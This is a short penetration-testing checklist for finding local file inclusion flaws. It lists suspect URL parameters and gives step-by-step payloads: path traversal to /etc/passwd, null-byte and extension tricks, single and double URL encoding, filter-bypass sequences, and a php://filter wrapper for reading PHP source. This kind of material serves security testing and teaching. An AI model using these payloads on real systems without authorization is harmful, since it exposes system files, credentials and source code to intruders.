Check for file uploads (e.g. profile pictures), location of imported scripts and images on the server and URL parameter (e.g. ?lang=en). Any parameter can be potentially vulnerable to local file inclusion but it's worth paying particular attention to the following parameters: cat, dir, action, filename, board, date, detail, file, download, path, folder, prefix, include, page, inc, locate, show, doc, site, type, view, content, document, layout, mod, conf and directory. To note that some vulnerable requests might be in an API call and not be directly reflected in the url of the website. These are most of the steps I usually follow:

1. Test adding "./": file=./image_id
2. Run a wordlist. If it doesn't find anything proceed to manual exploration.
3. Check for /etc/passwd using absolute paths: file=/etc/passwd
4. check for /etc/passwd using relative paths: file=../../../../../../../../../../etc/passwd
5. Append extension such as /etc/passwd.jpg (use an extension used by the files in the website)
6. Test with: /etc/passwd%00
7. Test /etc/passwd%00.jpg (the extension being used by the images on the website)
8. Check for /etc/passwd using UTF-8 encoded strings: file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
9. Check for non-recursive filtered out relative paths: file=..././..././..././..././etc/passwd
10. Try double-encoding: file=%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
11. Keep the path to the images folder in the URL: filename=/var/www/images/../../../../../etc/passwd.
12. If able to reach a PHP file but cannot see its contents try a PHP wrapper such as:

    http://example.com/index.php?filename=php://filter/convert.iconv.utf-8.utf-16/resource=index.php